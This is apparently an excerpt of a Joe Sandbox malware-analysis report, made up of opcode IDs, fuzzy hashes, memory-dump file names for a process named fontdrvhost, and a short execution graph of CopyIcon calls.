                                • Opcode ID: 7aa74113b3639238d143b812417116c79308d6ffaadfb6f610fdfe22e4b0ef9b
                                • Instruction ID: 4a5c4db6839267d208fbddde0f5e8ac840f423eb34e134ed68db95d5f1170d95
                                • Opcode Fuzzy Hash: 7aa74113b3639238d143b812417116c79308d6ffaadfb6f610fdfe22e4b0ef9b
                                • Instruction Fuzzy Hash: FF224C70A19A8D8FEBB8EF28C855BE977E1FF59301F00416AD84EC7291DB746640CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.1765258207.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_7ffd9b885000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: de1b4f3352ea8af34a017d3a55dbd1f59ecd11850bf77d1d1c2e4b5a51e46d7f
                                • Instruction ID: 39b4eeb4fe6d0f4fb141611063591c8857a949112da6354079e6b21c75a08e8e
                                • Opcode Fuzzy Hash: de1b4f3352ea8af34a017d3a55dbd1f59ecd11850bf77d1d1c2e4b5a51e46d7f
                                • Instruction Fuzzy Hash: 2C42F670E1962D8FDBA8DF68C8A0BE9B7B1FF58301F5041A9D05DA7295DA385A81CF40
                                Strings
                                Memory Dump Source
                                • Instruction Fuzzy Hash: 2D618C63B0F6895BEB2697DC6CA51E87FA1FF49760B4502F7E058C70E7EC156A028381
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: &
                                • API String ID: 0-2822232526
                                • Opcode ID: cd321057d251f09bcda9b15b6dbe99b4e2149a78e4270053a29c9e5ab1dc57a3
                                • Instruction ID: bcd4db4b620b57a27a799bda880e04e1d4ae6f58a087b656d34968166f594960
                                • Opcode Fuzzy Hash: cd321057d251f09bcda9b15b6dbe99b4e2149a78e4270053a29c9e5ab1dc57a3
                                • Instruction Fuzzy Hash: 2CD13B71E1965D8FDBACDB58D8A4BE8BBB1FF58300F4441B9D00DE32A6DA356981CB01
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: f4031201e5a582e0a2d396e6bfbb3b2db755ad948456b1cf2f40b264d5d0c7e3
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: f4031201e5a582e0a2d396e6bfbb3b2db755ad948456b1cf2f40b264d5d0c7e3
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8c0727e9adfec975ab7b4ecb59626ce5e8b4ab13a6ac585498d3126984864d4
                                • Instruction ID: d6dabe08745b9853c785e54efff18451fcc9ee6bc9771dcc4f684c83e4bd9218
                                • Opcode Fuzzy Hash: a8c0727e9adfec975ab7b4ecb59626ce5e8b4ab13a6ac585498d3126984864d4
                                • Instruction Fuzzy Hash: 70C18D74A0A91E8FEB64DBA884917ED7BF1FF98340F51417AD00DD32A6CB386946CB40
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 497b12d2225fa7b57419040f9df7f97e0d91b771bf4ec36b9262583d3ec762eb
                                • Instruction ID: 57221d883088d0131891cd9f7684e57bb9badaa9d05b3781d3ebaaa1c11cce86
                                • Opcode Fuzzy Hash: 497b12d2225fa7b57419040f9df7f97e0d91b771bf4ec36b9262583d3ec762eb
                                • Instruction Fuzzy Hash: 60B14D71E1965D8FDBACDB58D8A4BA8B7A1FF58300F0441B9D00DE72E6DE346981CB01
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4fe939921ff97e3827f13db6caea1c1ca0eb48a5c89fc4e6d4d6d7083a7c33ed
                                • Instruction ID: 869d75b574d930472c77c17d6a5dcef10c0d790432f922fe92d30e6248c682a3
                                • Opcode Fuzzy Hash: 4fe939921ff97e3827f13db6caea1c1ca0eb48a5c89fc4e6d4d6d7083a7c33ed
                                • Instruction Fuzzy Hash: 1781E231B1DA494BDF68EF5C88615B97BE2FF9C300B15457EE45EC3292DE34A9028780
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0f77e98aeef0cb21d4ab9ad9e36502dd4d5a74634521f07d2c3f8299a7e0934
                                • Instruction ID: 7a2d073a3fb9c1acd399327ce18878a39b0f41b220a296b98d08c306849be6bc
                                • Opcode Fuzzy Hash: c0f77e98aeef0cb21d4ab9ad9e36502dd4d5a74634521f07d2c3f8299a7e0934
                                • Instruction Fuzzy Hash: CC71A670E1461D8FDB94EFA8D895BECBBB1FF58300F5041AAD01DE3295DE3469818B41
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03f0ff4c531cdcb0880dc69581979b72529dc57271e5ce920c8c9b00b4da421a
                                • Instruction ID: 1247d787e82a0bf828cb4767e26e360577e965222b75a99e2f71e521b4f43252
                                • Opcode Fuzzy Hash: 03f0ff4c531cdcb0880dc69581979b72529dc57271e5ce920c8c9b00b4da421a
                                • Instruction Fuzzy Hash: C951DF30B1CA4A4FDB58EF5888645BA7BE2FF98304B15417EE45EC7292DE34E8028781
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a42254971db5bce3b6ffda56f20526509ac9759be393590ac27f9256f9ef8c5
                                • Instruction ID: cf7d3fd8a78943d921424e1bd009571ad9c05c7c0be30650b97abe5692912e2f
                                • Opcode Fuzzy Hash: 6a42254971db5bce3b6ffda56f20526509ac9759be393590ac27f9256f9ef8c5
                                • Instruction Fuzzy Hash: E6513071A1995D8FDF98EF98D865AECBBB1FF59300F41016AE00DE7292CA64A941CB40
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 029ebadd71077094fd9f9f1df1e6f17a60ff254428c064bcc2331d1c2c418012
                                • Instruction ID: 9de9bb09dc818fe9394bb3fd28d4f5d5b54727c63daaf68e689d009a0a704700
                                • Opcode Fuzzy Hash: 029ebadd71077094fd9f9f1df1e6f17a60ff254428c064bcc2331d1c2c418012
                                • Instruction Fuzzy Hash: 0851D361A0E69D4FEBA6DBA88C657A87FA0EF59300F0540F7D08CC71E7DE246A85C741
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c65adbb096a09b377d24285662f002779b1e0cfdf9c957a8f4789634a8ccfe5f
                                • Instruction ID: db19cc34c88909f789a19a9b7b91aab49195fa7926c1dd84f6bcf130e09ce503
                                • Opcode Fuzzy Hash: c65adbb096a09b377d24285662f002779b1e0cfdf9c957a8f4789634a8ccfe5f
                                • Instruction Fuzzy Hash: 42319231E1E61E9AEB74BB9084217F8B6A1FF4A700F410279D05EA21E1CF396A45DA80
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c13f12d82b8e86c3d2dacf075f1061e38c383c114ddbf000de0ca116b10239d
                                • Instruction ID: cf497271cf6eb1dd01ff9ea11ac21184302b82036788e92e266210a3b66e653f
                                • Opcode Fuzzy Hash: 0c13f12d82b8e86c3d2dacf075f1061e38c383c114ddbf000de0ca116b10239d
                                • Instruction Fuzzy Hash: 84415F31E09A1D9FDB54EB98C8A4AEDBBF1FF59301F4100AAD409E72A1DB399945CB40
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7acc43e77254cb7cb3cbbe04cfe9c475cbc2e95c379c6d99f583c197e4551b0
                                • Instruction ID: 447a147e8eca9c8065f385fc5e61b96828d995ea955603b6985e41f5825cae3e
                                • Opcode Fuzzy Hash: d7acc43e77254cb7cb3cbbe04cfe9c475cbc2e95c379c6d99f583c197e4551b0
                                • Instruction Fuzzy Hash: 28414C70E14A4D8FEB54EF98D865AEDBBF1FF48310F010176E418E3296DA3469418B91
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fe34fb5ceb0e305edab362c0c3d625700222a047cd0c959a8dda3d5cf8917bd
                                • Instruction ID: 8faf8d8ffa4a88d0fc26815155a220bd65e94baa7cd1fb49b3406a5300d99eb2
                                • Opcode Fuzzy Hash: 0fe34fb5ceb0e305edab362c0c3d625700222a047cd0c959a8dda3d5cf8917bd
                                • Instruction Fuzzy Hash: 1E417C70D096498FEB55DFA4C864AEDBBF1FF49300F1101BAD009D72AACB399981CB41
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ed9d35e242e4cb91d7b5482fe3c7cdcb13b7372dc7b6dbaddb3b12cba799e24
                                • Instruction ID: 4a07fb8382b768ba6237b59f8829aa9ba1cecb6d57a9c2ed6543046053d059a3
                                • Opcode Fuzzy Hash: 9ed9d35e242e4cb91d7b5482fe3c7cdcb13b7372dc7b6dbaddb3b12cba799e24
                                • Instruction Fuzzy Hash: FF314A31E0961E8FDB58DFA4D4646FEBBB1EF58300F11017AE019A32D1CA385A41CB90
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 73a63ce6175d905e69dd8ca6de03b4072f37bb9d78bc9e1c5b8f6cc4f52b0580
                                • Instruction ID: 7213d585bfc4eeb08895538f63bb5139d695d715ee171c8dbcbc22edc556f2ca
                                • Opcode Fuzzy Hash: 73a63ce6175d905e69dd8ca6de03b4072f37bb9d78bc9e1c5b8f6cc4f52b0580
                                • Instruction Fuzzy Hash: 3D314D71E09A0D8FDF98EF9CD495AADB7F1FF99310F10016AE41DD7295CA35A8428B40
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 641946f16a7b3deb8fc21a517114300b4b3966abc4b9a27afb953abdfc849386
                                • Instruction ID: 0e555f493d9d797c700c0bc0a7293de232bc86775fe2fa901b80d6e6e22959a9
                                • Opcode Fuzzy Hash: 641946f16a7b3deb8fc21a517114300b4b3966abc4b9a27afb953abdfc849386
                                • Instruction Fuzzy Hash: B031042090F7CE1FE7A69BB4C864AE87FB1DF4A310F0904EED089D7197C9189945C712
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26618ae5b242d8d74157ccee766ddd83fa28e9363d9369510809beb495f6e2a4
                                • Instruction ID: 66e3adcf0de6cc9aafbaeab7b2f35e5bffb114c10f4ed7a75616bc546b156458
                                • Opcode Fuzzy Hash: 26618ae5b242d8d74157ccee766ddd83fa28e9363d9369510809beb495f6e2a4
                                • Instruction Fuzzy Hash: AA310671E0A65D8FDB59DFA8D8506EDBBB1FF59300F10056AE019E3291DB38A941CB81
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 92d2dc6394a82665ea0fbf56d1c43fbabb40c8bc8fd551d87ca36f0f0d6fc856
                                • Instruction ID: 562591556a54ec7001ce8ba259cf442e61daf040747a8a2d11776369b527ace2
                                • Opcode Fuzzy Hash: 92d2dc6394a82665ea0fbf56d1c43fbabb40c8bc8fd551d87ca36f0f0d6fc856
                                • Instruction Fuzzy Hash: 93110D31E1A52D8EDB68EB60D4617FCB671FF06701F8114B9D04EA6192CE356A44DB40
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 92ce8955bcc542d98ab5bb8b12fe12327bec283ff203c2c7b88db82b30428942
                                • Instruction ID: 4b73fa44641133ae920d4acd5372523be7110f37dff1cae1d1de0502f2209aaf
                                • Opcode Fuzzy Hash: 92ce8955bcc542d98ab5bb8b12fe12327bec283ff203c2c7b88db82b30428942
                                • Instruction Fuzzy Hash: 55112331F1590E8ECF68EB94C8247EDB7A1FF49300F80027AD019EB1A5CE3469458B80
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4311021a779d052cc75cecf8f02a282c76a319e316c78354d7980dae8289f354
                                • Instruction ID: 5d19f5dcc1fe2e40586fafbdfebaae3fefc98d384f43d10272ef15aa14e5d0ec
                                • Opcode Fuzzy Hash: 4311021a779d052cc75cecf8f02a282c76a319e316c78354d7980dae8289f354
                                • Instruction Fuzzy Hash: EFF02831A0964D8FD794EB6888995EC7FF0EF48300F8101FAD008D61A2DF3916458741
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11c64b740314d6fe7d2b81a47c9fbb6732ea66fe7e4e8695a6a147c17dd6a19c
                                • Instruction ID: 02dfe0b0ddce01c828f1c8b7fd864dc9f9ab60e10731d8cfe7f40529859888ac
                                • Opcode Fuzzy Hash: 11c64b740314d6fe7d2b81a47c9fbb6732ea66fe7e4e8695a6a147c17dd6a19c
                                • Instruction Fuzzy Hash: A7F02831A0E64D5FDB15EB6888A56ECBFE0EF44200F4101F6D418C71E3EB286946C341
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9f5de71d01e310d25de19f42e5ee6523df042c258de0c6b1d5f996b249653be
                                • Instruction ID: 683c7e45f6f642c667c76ad803354b27e57d7bdbe11b3004d70b4304ad76e78f
                                • Opcode Fuzzy Hash: a9f5de71d01e310d25de19f42e5ee6523df042c258de0c6b1d5f996b249653be
                                • Instruction Fuzzy Hash: D8F0BE3050E64D8FCB66EF54C8556E93FA0FF5A304F0501AAE41CC7192CB7ADA65CB81
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 500118512eb54cf92b67c96bc0d766dcbf6e2a17216721d4abec9971268ff83f
                                • Instruction ID: 4048d96800965dfb7060e78b7be9f0d8d69aafa579e19a1f6fbbc2c03cad8fd4
                                • Opcode Fuzzy Hash: 500118512eb54cf92b67c96bc0d766dcbf6e2a17216721d4abec9971268ff83f
                                • Instruction Fuzzy Hash: 21F03C3191D68E8FDB51EB6888686ED7FF0FF1A304F0505ABD458D70A2DB345544CB51
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae5eadda36293c1844d6bf955b0813ebf6c4e0d205ad985bb9f61d872076c60
                                • Instruction ID: c73a1cfb75593f64e3e0008c71f261493adb5a5bc827a0156a1bef8181961530
                                • Opcode Fuzzy Hash: 5ae5eadda36293c1844d6bf955b0813ebf6c4e0d205ad985bb9f61d872076c60
                                • Instruction Fuzzy Hash: 84F05E3050960E8FDB55EF9494116E577A0FF59304F000176E41CD2195CA35A660C781
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction ID: e2ec2e70e633c6ae88e18efbee7d7a10bc5649352f1e22dd7151f5da005ff06a
                                • Opcode Fuzzy Hash: 885604a77612b4007665538a6f7475fabccb69192ee82b013977f59083f09ceb
                                • Instruction Fuzzy Hash: 31E06832A49D0D8BCF609F98AC102843BB1FB4D304F01026DE04CC3180D3355E52C300
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction ID: 716a5aa4a74f656992352075b491c820e1c1d6a9f034f43921e73d89af15dad2
                                • Opcode Fuzzy Hash: eb421aba41ecdfd5ea69e883e024c37e4698630aab55df376e19af45b9b23214
                                • Instruction Fuzzy Hash: CFE06872A09A0C4BDB509F9CAC6028837A0FB4C308F010269D44CD7180D3215544C301
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f7d79206b12b07de61fd83f9da4de32b370e39b841b084be9c66662cce74ff9
                                • Instruction ID: 5dc29335e76615ef497502ba6ce31a1219a49da787af1f3546836c0c06e8d05a
                                • Opcode Fuzzy Hash: 2f7d79206b12b07de61fd83f9da4de32b370e39b841b084be9c66662cce74ff9
                                • Instruction Fuzzy Hash: DAE0923185F68E5FDB266F6089661E97F60FF05310F0616FBD058861D3DB6C9628C741
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b1f98a806bba9975e56d2760c8cbbb1c488bb2ae63c72e8e6b2c22bed4af81a9
                                • Instruction ID: 8b27181e0ccf9da73061104166d19654a517ccd7793feb9473d6d962f14127ea
                                • Opcode Fuzzy Hash: b1f98a806bba9975e56d2760c8cbbb1c488bb2ae63c72e8e6b2c22bed4af81a9
                                • Instruction Fuzzy Hash: 24F0E53194F38E4FDB666B6048611D97F70FF06600F0A06BAD068C61E3DB6CD658C342
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bfb220e1b457fb724ba4ba37278052fea1cc8b2eab7e370d4e87bcd651b87e29
                                • Instruction ID: a2d6af88866945c820f29bcae167a795dc0ab92fc8ad27521d56e405cc7c024d
                                • Opcode Fuzzy Hash: bfb220e1b457fb724ba4ba37278052fea1cc8b2eab7e370d4e87bcd651b87e29
                                • Instruction Fuzzy Hash: 6DF01270A0485E4FDFA8EF18C894BA9B3F1FB58340F1086E6940DE3255DA30AEC58F80
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: f30041032725aa9d0cdc4c1f37f2548c3d31e79fd394116e7dc55691a201d6d8
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: 57E04F3050960ECFDFA4FF58C4506A67BA1FF58344F100539E41CD2190CB35E6A0CB80
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a54b59529ed083488a45c38b10bf54daad0eab8b47dc10777a560c8594da284a
                                • Instruction ID: 2e3a4e606b7cf8193bcb50d1685a8dddc49bfd14eeba6d52536beba15c478ef4
                                • Opcode Fuzzy Hash: a54b59529ed083488a45c38b10bf54daad0eab8b47dc10777a560c8594da284a
                                • Instruction Fuzzy Hash: 51D0E231B05A2D8ECB64EA88E8107EDB7B1EB89311F8002B2C50CE3159CA3069468B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                • Opcode ID: 492069b6d2fae864101df20032f08b8a213227997577dc6a43dc202ffccb7524
                                • Instruction ID: 8dc97e7f07101676ef18734aeee0b7967a5b85ea0b2859dab36eab07a6171790
                                • Opcode Fuzzy Hash: 492069b6d2fae864101df20032f08b8a213227997577dc6a43dc202ffccb7524
                                • Instruction Fuzzy Hash: 63518A63B0F6851BEB2297DC6CA51A87FA1FF45B6075901F7E198C70A7F815A90283C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: 0e6d96fb6f5052b4dda33a4173e45613758cf99961ec4940e907fce15c08cde3
                                • Instruction ID: 131f10e2c7c1654ef6655b4177617c089ce11ab38812a706647eca96fa643a23
                                • Opcode Fuzzy Hash: 0e6d96fb6f5052b4dda33a4173e45613758cf99961ec4940e907fce15c08cde3
                                • Instruction Fuzzy Hash: 5351A963B0F6951BEB2657EC2CA00A86F91FF85B7071506F7E198CB0E7E815A90683C1

                                Execution Graph

                                Execution Coverage:17.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:3
                                execution_graph 18174 7ffd9b8b68c9 18175 7ffd9b8b68d1 CopyIcon 18174->18175 18177 7ffd9b8b69c4 18175->18177 18157 7ffd9b8b6250 18162 7ffd9b8b6259 18157->18162 18158 7ffd9b8b6304 18160 7ffd9b8b66c4 18169 7ffd9b8b687e 18160->18169 18162->18158 18162->18160 18163 7ffd9b8b682b 18162->18163 18165 7ffd9b8b6836 18163->18165 18166 7ffd9b8b687e 18163->18166 18164 7ffd9b8b6889 18164->18160 18165->18160 18166->18164 18167 7ffd9b8b698d CopyIcon 18166->18167 18168 7ffd9b8b69c4 18167->18168 18168->18160 18170 7ffd9b8b6889 18169->18170 18171 7ffd9b8b68d1 CopyIcon 18169->18171 18170->18158 18173 7ffd9b8b69c4 18171->18173 18173->18158

                                Control-flow Graph

                                • Executed
                                • Not Executed
